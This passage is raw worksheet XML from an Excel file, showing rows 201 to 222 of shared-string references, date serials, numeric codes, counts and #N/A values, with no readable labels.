      <c r="K201" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L201" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M201" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N201" s="1"/>
      <c r="O201" s="1"/>
      <c r="P201" s="1"/>
      <c r="Q201" s="1" t="s">
        <v>3568</v>
      </c>
      <c r="R201" s="83">
        <v>1710</v>
      </c>
      <c r="S201" s="83">
        <v>4274</v>
      </c>
      <c r="T201" s="83">
        <v>2877</v>
      </c>
      <c r="U201" s="83">
        <v>3191</v>
      </c>
      <c r="V201" s="83">
        <v>2013</v>
      </c>
      <c r="W201" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="202" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A202" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B202" s="51">
        <v>44400.387266226855</v>
      </c>
      <c r="C202" s="1" t="s">
        <v>2293</v>
      </c>
      <c r="D202" s="43">
        <v>100</v>
      </c>
      <c r="E202" s="1" t="s">
        <v>2294</v>
      </c>
      <c r="F202" s="43">
        <v>100</v>
      </c>
      <c r="G202" s="1" t="s">
        <v>2295</v>
      </c>
      <c r="H202" s="1" t="s">
        <v>2296</v>
      </c>
      <c r="I202" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J202" s="1" t="s">
        <v>43</v>
      </c>
      <c r="K202" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L202" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M202" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N202" s="1"/>
      <c r="O202" s="1"/>
      <c r="P202" s="1"/>
      <c r="Q202" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R202" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S202" s="83">
        <v>8</v>
      </c>
      <c r="T202" s="83">
        <v>2</v>
      </c>
      <c r="U202" s="83">
        <v>75</v>
      </c>
      <c r="V202" s="83">
        <v>92</v>
      </c>
      <c r="W202" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="203" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A203" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B203" s="51">
        <v>44400.387266215279</v>
      </c>
      <c r="C203" s="1" t="s">
        <v>2293</v>
      </c>
      <c r="D203" s="43">
        <v>100</v>
      </c>
      <c r="E203" s="1" t="s">
        <v>2297</v>
      </c>
      <c r="F203" s="43">
        <v>100</v>
      </c>
      <c r="G203" s="1" t="s">
        <v>2298</v>
      </c>
      <c r="H203" s="1" t="s">
        <v>2299</v>
      </c>
      <c r="I203" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J203" s="1" t="s">
        <v>43</v>
      </c>
      <c r="K203" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L203" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M203" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N203" s="1"/>
      <c r="O203" s="1"/>
      <c r="P203" s="1"/>
      <c r="Q203" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R203" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S203" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T203" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U203" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V203" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W203" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="204" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A204" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B204" s="51">
        <v>44425.802171331015</v>
      </c>
      <c r="C204" s="1" t="s">
        <v>2300</v>
      </c>
      <c r="D204" s="43">
        <v>111</v>
      </c>
      <c r="E204" s="1" t="s">
        <v>2301</v>
      </c>
      <c r="F204" s="43">
        <v>111</v>
      </c>
      <c r="G204" s="1" t="s">
        <v>2302</v>
      </c>
      <c r="H204" s="1" t="s">
        <v>2303</v>
      </c>
      <c r="I204" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J204" s="1" t="s">
        <v>43</v>
      </c>
      <c r="K204" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L204" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M204" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N204" s="1"/>
      <c r="O204" s="1"/>
      <c r="P204" s="1"/>
      <c r="Q204" s="1" t="s">
        <v>3568</v>
      </c>
      <c r="R204" s="83">
        <v>88076</v>
      </c>
      <c r="S204" s="83">
        <v>160821</v>
      </c>
      <c r="T204" s="83">
        <v>94299</v>
      </c>
      <c r="U204" s="83">
        <v>86298</v>
      </c>
      <c r="V204" s="83">
        <v>74860</v>
      </c>
      <c r="W204" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="205" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A205" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B205" s="51">
        <v>44434.822725185186</v>
      </c>
      <c r="C205" s="1" t="s">
        <v>2304</v>
      </c>
      <c r="D205" s="43">
        <v>102</v>
      </c>
      <c r="E205" s="1" t="s">
        <v>2305</v>
      </c>
      <c r="F205" s="26">
        <v>102</v>
      </c>
      <c r="G205" s="1" t="s">
        <v>2306</v>
      </c>
      <c r="H205" s="1" t="s">
        <v>2307</v>
      </c>
      <c r="I205" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J205" s="1" t="s">
        <v>43</v>
      </c>
      <c r="K205" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L205" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M205" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N205" s="1"/>
      <c r="O205" s="1"/>
      <c r="P205" s="1"/>
      <c r="Q205" s="1" t="s">
        <v>3569</v>
      </c>
      <c r="R205" s="83">
        <v>2527</v>
      </c>
      <c r="S205" s="83">
        <v>4084</v>
      </c>
      <c r="T205" s="83">
        <v>2396</v>
      </c>
      <c r="U205" s="83">
        <v>2598</v>
      </c>
      <c r="V205" s="83">
        <v>3968</v>
      </c>
      <c r="W205" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="206" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A206" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B206" s="51">
        <v>44649.645903877317</v>
      </c>
      <c r="C206" s="1" t="s">
        <v>2320</v>
      </c>
      <c r="D206" s="26">
        <v>110</v>
      </c>
      <c r="E206" s="1" t="s">
        <v>2325</v>
      </c>
      <c r="F206" s="26">
        <v>100</v>
      </c>
      <c r="G206" s="57" t="s">
        <v>2326</v>
      </c>
      <c r="H206" s="1" t="s">
        <v>2327</v>
      </c>
      <c r="I206" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J206" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K206" s="3" t="s">
        <v>575</v>
      </c>
      <c r="L206" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M206" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N206" s="1"/>
      <c r="O206" s="1"/>
      <c r="P206" s="1"/>
      <c r="Q206" s="1" t="s">
        <v>3570</v>
      </c>
      <c r="R206" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S206" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T206" s="83">
        <v>23</v>
      </c>
      <c r="U206" s="83">
        <v>9</v>
      </c>
      <c r="V206" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W206" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="207" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A207" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B207" s="51">
        <v>44474.592447743053</v>
      </c>
      <c r="C207" s="1" t="s">
        <v>2320</v>
      </c>
      <c r="D207" s="43">
        <v>110</v>
      </c>
      <c r="E207" s="1" t="s">
        <v>2329</v>
      </c>
      <c r="F207" s="26">
        <v>101</v>
      </c>
      <c r="G207" s="1" t="s">
        <v>2330</v>
      </c>
      <c r="H207" s="1" t="s">
        <v>2331</v>
      </c>
      <c r="I207" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J207" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K207" s="3" t="s">
        <v>575</v>
      </c>
      <c r="L207" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M207" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N207" s="1"/>
      <c r="O207" s="1"/>
      <c r="P207" s="1"/>
      <c r="Q207" s="1" t="s">
        <v>3570</v>
      </c>
      <c r="R207" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S207" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T207" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U207" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V207" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W207" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="208" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A208" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B208" s="51">
        <v>44588.71479027778</v>
      </c>
      <c r="C208" s="1" t="s">
        <v>2332</v>
      </c>
      <c r="D208" s="26">
        <v>201</v>
      </c>
      <c r="E208" s="1" t="s">
        <v>2333</v>
      </c>
      <c r="F208" s="26">
        <v>101</v>
      </c>
      <c r="G208" s="1" t="s">
        <v>2334</v>
      </c>
      <c r="H208" s="1" t="s">
        <v>2335</v>
      </c>
      <c r="I208" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J208" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K208" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L208" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M208" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N208" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O208" s="1"/>
      <c r="P208" s="1"/>
      <c r="Q208" s="1" t="s">
        <v>3571</v>
      </c>
      <c r="R208" s="83">
        <v>408</v>
      </c>
      <c r="S208" s="83">
        <v>606</v>
      </c>
      <c r="T208" s="83">
        <v>767</v>
      </c>
      <c r="U208" s="83">
        <v>3512</v>
      </c>
      <c r="V208" s="83">
        <v>125382</v>
      </c>
      <c r="W208" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="209" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A209" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B209" s="51">
        <v>44567.597528530096</v>
      </c>
      <c r="C209" s="1" t="s">
        <v>2332</v>
      </c>
      <c r="D209" s="26">
        <v>100</v>
      </c>
      <c r="E209" s="1" t="s">
        <v>2337</v>
      </c>
      <c r="F209" s="26">
        <v>100</v>
      </c>
      <c r="G209" s="1" t="s">
        <v>2338</v>
      </c>
      <c r="H209" s="1" t="s">
        <v>2339</v>
      </c>
      <c r="I209" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J209" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K209" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L209" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M209" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N209" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O209" s="1"/>
      <c r="P209" s="1"/>
      <c r="Q209" s="1" t="s">
        <v>3572</v>
      </c>
      <c r="R209" s="83">
        <v>310707</v>
      </c>
      <c r="S209" s="83">
        <v>641937</v>
      </c>
      <c r="T209" s="83">
        <v>166967</v>
      </c>
      <c r="U209" s="83">
        <v>388546</v>
      </c>
      <c r="V209" s="83">
        <v>259734</v>
      </c>
      <c r="W209" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="210" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A210" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B210" s="51">
        <v>44055.653204247683</v>
      </c>
      <c r="C210" s="1" t="s">
        <v>2332</v>
      </c>
      <c r="D210" s="43">
        <v>201</v>
      </c>
      <c r="E210" s="1" t="s">
        <v>2337</v>
      </c>
      <c r="F210" s="26">
        <v>200</v>
      </c>
      <c r="G210" s="1" t="s">
        <v>2338</v>
      </c>
      <c r="H210" s="1" t="s">
        <v>2341</v>
      </c>
      <c r="I210" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J210" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K210" s="3" t="s">
        <v>31</v>
      </c>
      <c r="L210" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M210" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N210" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O210" s="1"/>
      <c r="P210" s="1"/>
      <c r="Q210" s="1" t="s">
        <v>3571</v>
      </c>
      <c r="R210" s="83">
        <v>310707</v>
      </c>
      <c r="S210" s="83">
        <v>641937</v>
      </c>
      <c r="T210" s="83">
        <v>166967</v>
      </c>
      <c r="U210" s="83">
        <v>388546</v>
      </c>
      <c r="V210" s="83">
        <v>259734</v>
      </c>
      <c r="W210" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="211" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A211" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B211" s="51">
        <v>44588.714790358797</v>
      </c>
      <c r="C211" s="1" t="s">
        <v>2332</v>
      </c>
      <c r="D211" s="43">
        <v>100</v>
      </c>
      <c r="E211" s="1" t="s">
        <v>2342</v>
      </c>
      <c r="F211" s="26">
        <v>100</v>
      </c>
      <c r="G211" s="1" t="s">
        <v>2343</v>
      </c>
      <c r="H211" s="1" t="s">
        <v>2344</v>
      </c>
      <c r="I211" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J211" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K211" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L211" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M211" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N211" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O211" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P211" s="1"/>
      <c r="Q211" s="1" t="s">
        <v>3572</v>
      </c>
      <c r="R211" s="83">
        <v>693129</v>
      </c>
      <c r="S211" s="83">
        <v>577177</v>
      </c>
      <c r="T211" s="83">
        <v>472980</v>
      </c>
      <c r="U211" s="83">
        <v>551060</v>
      </c>
      <c r="V211" s="83">
        <v>743811</v>
      </c>
      <c r="W211" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="212" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A212" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B212" s="51">
        <v>44055.653204212962</v>
      </c>
      <c r="C212" s="1" t="s">
        <v>2332</v>
      </c>
      <c r="D212" s="43">
        <v>201</v>
      </c>
      <c r="E212" s="1" t="s">
        <v>2345</v>
      </c>
      <c r="F212" s="26">
        <v>110</v>
      </c>
      <c r="G212" s="1" t="s">
        <v>2343</v>
      </c>
      <c r="H212" s="1" t="s">
        <v>2344</v>
      </c>
      <c r="I212" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J212" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K212" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L212" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M212" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N212" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O212" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P212" s="1"/>
      <c r="Q212" s="1" t="s">
        <v>3571</v>
      </c>
      <c r="R212" s="83">
        <v>693129</v>
      </c>
      <c r="S212" s="83">
        <v>577177</v>
      </c>
      <c r="T212" s="83">
        <v>472980</v>
      </c>
      <c r="U212" s="83">
        <v>551060</v>
      </c>
      <c r="V212" s="83">
        <v>743811</v>
      </c>
      <c r="W212" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="213" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A213" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B213" s="51">
        <v>44525.495957129628</v>
      </c>
      <c r="C213" s="1" t="s">
        <v>1646</v>
      </c>
      <c r="D213" s="43">
        <v>100</v>
      </c>
      <c r="E213" s="1" t="s">
        <v>2346</v>
      </c>
      <c r="F213" s="26">
        <v>100</v>
      </c>
      <c r="G213" s="1" t="s">
        <v>2347</v>
      </c>
      <c r="H213" s="1" t="s">
        <v>2348</v>
      </c>
      <c r="I213" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J213" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K213" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L213" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M213" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N213" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O213" s="1"/>
      <c r="P213" s="1"/>
      <c r="Q213" s="1" t="s">
        <v>3555</v>
      </c>
      <c r="R213" s="83">
        <v>205</v>
      </c>
      <c r="S213" s="83">
        <v>684</v>
      </c>
      <c r="T213" s="83">
        <v>597</v>
      </c>
      <c r="U213" s="83">
        <v>1285</v>
      </c>
      <c r="V213" s="83">
        <v>2107</v>
      </c>
      <c r="W213" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="214" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A214" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B214" s="51">
        <v>44616.803946759261</v>
      </c>
      <c r="C214" s="1" t="s">
        <v>2349</v>
      </c>
      <c r="D214" s="43">
        <v>100</v>
      </c>
      <c r="E214" s="1" t="s">
        <v>2350</v>
      </c>
      <c r="F214" s="26">
        <v>100</v>
      </c>
      <c r="G214" s="57" t="s">
        <v>2351</v>
      </c>
      <c r="H214" s="1" t="s">
        <v>2352</v>
      </c>
      <c r="I214" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J214" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K214" s="3" t="s">
        <v>575</v>
      </c>
      <c r="L214" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M214" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N214" s="1"/>
      <c r="O214" s="1" t="s">
        <v>2353</v>
      </c>
      <c r="P214" s="1"/>
      <c r="Q214" s="1" t="s">
        <v>3573</v>
      </c>
      <c r="R214" s="83">
        <v>2</v>
      </c>
      <c r="S214" s="83">
        <v>29</v>
      </c>
      <c r="T214" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U214" s="83">
        <v>23</v>
      </c>
      <c r="V214" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W214" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="215" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A215" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B215" s="51">
        <v>44223.845142511571</v>
      </c>
      <c r="C215" s="1" t="s">
        <v>2355</v>
      </c>
      <c r="D215" s="43">
        <v>223</v>
      </c>
      <c r="E215" s="1" t="s">
        <v>2356</v>
      </c>
      <c r="F215" s="26">
        <v>102</v>
      </c>
      <c r="G215" s="1" t="s">
        <v>2357</v>
      </c>
      <c r="H215" s="1" t="s">
        <v>2358</v>
      </c>
      <c r="I215" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J215" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K215" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L215" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M215" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N215" s="1"/>
      <c r="O215" s="1" t="s">
        <v>2359</v>
      </c>
      <c r="P215" s="1"/>
      <c r="Q215" s="1" t="s">
        <v>3574</v>
      </c>
      <c r="R215" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S215" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T215" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U215" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V215" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W215" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="216" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A216" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B216" s="51">
        <v>44322.944375798608</v>
      </c>
      <c r="C216" s="1" t="s">
        <v>2355</v>
      </c>
      <c r="D216" s="43">
        <v>223</v>
      </c>
      <c r="E216" s="1" t="s">
        <v>2361</v>
      </c>
      <c r="F216" s="43">
        <v>222</v>
      </c>
      <c r="G216" s="1" t="s">
        <v>2362</v>
      </c>
      <c r="H216" s="1" t="s">
        <v>2363</v>
      </c>
      <c r="I216" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J216" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K216" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L216" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M216" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N216" s="1"/>
      <c r="O216" s="1" t="s">
        <v>2364</v>
      </c>
      <c r="P216" s="1" t="s">
        <v>920</v>
      </c>
      <c r="Q216" s="1" t="s">
        <v>3574</v>
      </c>
      <c r="R216" s="83">
        <v>1695225</v>
      </c>
      <c r="S216" s="83">
        <v>1455563</v>
      </c>
      <c r="T216" s="83">
        <v>1467864</v>
      </c>
      <c r="U216" s="83">
        <v>1312363</v>
      </c>
      <c r="V216" s="83">
        <v>1617573</v>
      </c>
      <c r="W216" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="217" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A217" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B217" s="51">
        <v>43977.482397523148</v>
      </c>
      <c r="C217" s="1" t="s">
        <v>2355</v>
      </c>
      <c r="D217" s="43">
        <v>223</v>
      </c>
      <c r="E217" s="1" t="s">
        <v>2365</v>
      </c>
      <c r="F217" s="26">
        <v>100</v>
      </c>
      <c r="G217" s="1" t="s">
        <v>2366</v>
      </c>
      <c r="H217" s="1" t="s">
        <v>1071</v>
      </c>
      <c r="I217" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J217" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K217" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L217" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M217" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N217" s="1"/>
      <c r="O217" s="1" t="s">
        <v>2367</v>
      </c>
      <c r="P217" s="1"/>
      <c r="Q217" s="1" t="s">
        <v>3574</v>
      </c>
      <c r="R217" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S217" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T217" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U217" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V217" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W217" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="218" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A218" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B218" s="51">
        <v>44223.845142442129</v>
      </c>
      <c r="C218" s="1" t="s">
        <v>2355</v>
      </c>
      <c r="D218" s="43">
        <v>223</v>
      </c>
      <c r="E218" s="1" t="s">
        <v>2368</v>
      </c>
      <c r="F218" s="43">
        <v>111</v>
      </c>
      <c r="G218" s="1" t="s">
        <v>2369</v>
      </c>
      <c r="H218" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I218" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J218" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K218" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L218" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M218" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N218" s="1"/>
      <c r="O218" s="1" t="s">
        <v>2370</v>
      </c>
      <c r="P218" s="1" t="s">
        <v>181</v>
      </c>
      <c r="Q218" s="1" t="s">
        <v>3574</v>
      </c>
      <c r="R218" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S218" s="83">
        <v>17</v>
      </c>
      <c r="T218" s="83">
        <v>1</v>
      </c>
      <c r="U218" s="83">
        <v>33</v>
      </c>
      <c r="V218" s="83">
        <v>2</v>
      </c>
      <c r="W218" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="219" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A219" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B219" s="51">
        <v>44322.94437582176</v>
      </c>
      <c r="C219" s="1" t="s">
        <v>2355</v>
      </c>
      <c r="D219" s="43">
        <v>223</v>
      </c>
      <c r="E219" s="1" t="s">
        <v>2371</v>
      </c>
      <c r="F219" s="26">
        <v>112</v>
      </c>
      <c r="G219" s="1" t="s">
        <v>2372</v>
      </c>
      <c r="H219" t="s">
        <v>2373</v>
      </c>
      <c r="I219" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J219" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K219" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L219" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M219" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N219" s="1"/>
      <c r="O219" s="1" t="s">
        <v>2374</v>
      </c>
      <c r="P219" s="1"/>
      <c r="Q219" s="1" t="s">
        <v>3574</v>
      </c>
      <c r="R219" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S219" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T219" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U219" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V219" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W219" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="220" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A220" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B220" s="51">
        <v>44433.736928321756</v>
      </c>
      <c r="C220" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="D220" s="26">
        <v>111</v>
      </c>
      <c r="E220" s="1" t="s">
        <v>2375</v>
      </c>
      <c r="F220" s="26">
        <v>101</v>
      </c>
      <c r="G220" s="1" t="s">
        <v>2376</v>
      </c>
      <c r="H220" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="I220" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J220" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K220" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L220" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M220" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N220" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O220" s="1"/>
      <c r="P220" s="1"/>
      <c r="Q220" s="1" t="s">
        <v>3551</v>
      </c>
      <c r="R220" s="83">
        <v>175315</v>
      </c>
      <c r="S220" s="83">
        <v>264901</v>
      </c>
      <c r="T220" s="83">
        <v>292700</v>
      </c>
      <c r="U220" s="83">
        <v>308208</v>
      </c>
      <c r="V220" s="83">
        <v>396773</v>
      </c>
      <c r="W220" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="221" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A221" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B221" s="51">
        <v>44519.632626620369</v>
      </c>
      <c r="C221" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="D221" s="43">
        <v>201</v>
      </c>
      <c r="E221" s="1" t="s">
        <v>2375</v>
      </c>
      <c r="F221" s="26">
        <v>200</v>
      </c>
      <c r="G221" s="1" t="s">
        <v>2376</v>
      </c>
      <c r="H221" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="I221" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J221" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K221" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L221" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M221" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N221" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O221" s="1"/>
      <c r="P221" s="1"/>
      <c r="Q221" s="1" t="s">
        <v>3552</v>
      </c>
      <c r="R221" s="83">
        <v>175315</v>
      </c>
      <c r="S221" s="83">
        <v>264901</v>
      </c>
      <c r="T221" s="83">
        <v>292700</v>
      </c>
      <c r="U221" s="83">
        <v>308208</v>
      </c>
      <c r="V221" s="83">
        <v>396773</v>
      </c>
      <c r="W221" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="222" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A222" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B222" s="51">
        <v>44670.815063148148</v>
      </c>
      <c r="C222" s="1" t="s">
        <v>2378</v>
      </c>
      <c r="D222" s="26">
        <v>101</v>
      </c>
      <c r="E222" s="1" t="s">
        <v>2379</v>
      </c>
      <c r="F222" s="26">
        <v>101</v>
      </c>
      <c r="G222" s="57" t="s">
        <v>2380</v>
      </c>
      <c r="H222" s="1" t="s">
        <v>2381</v>
      </c>
      <c r="I222" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J222" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K222" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L222" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M222" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N222" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O222" s="1"/>
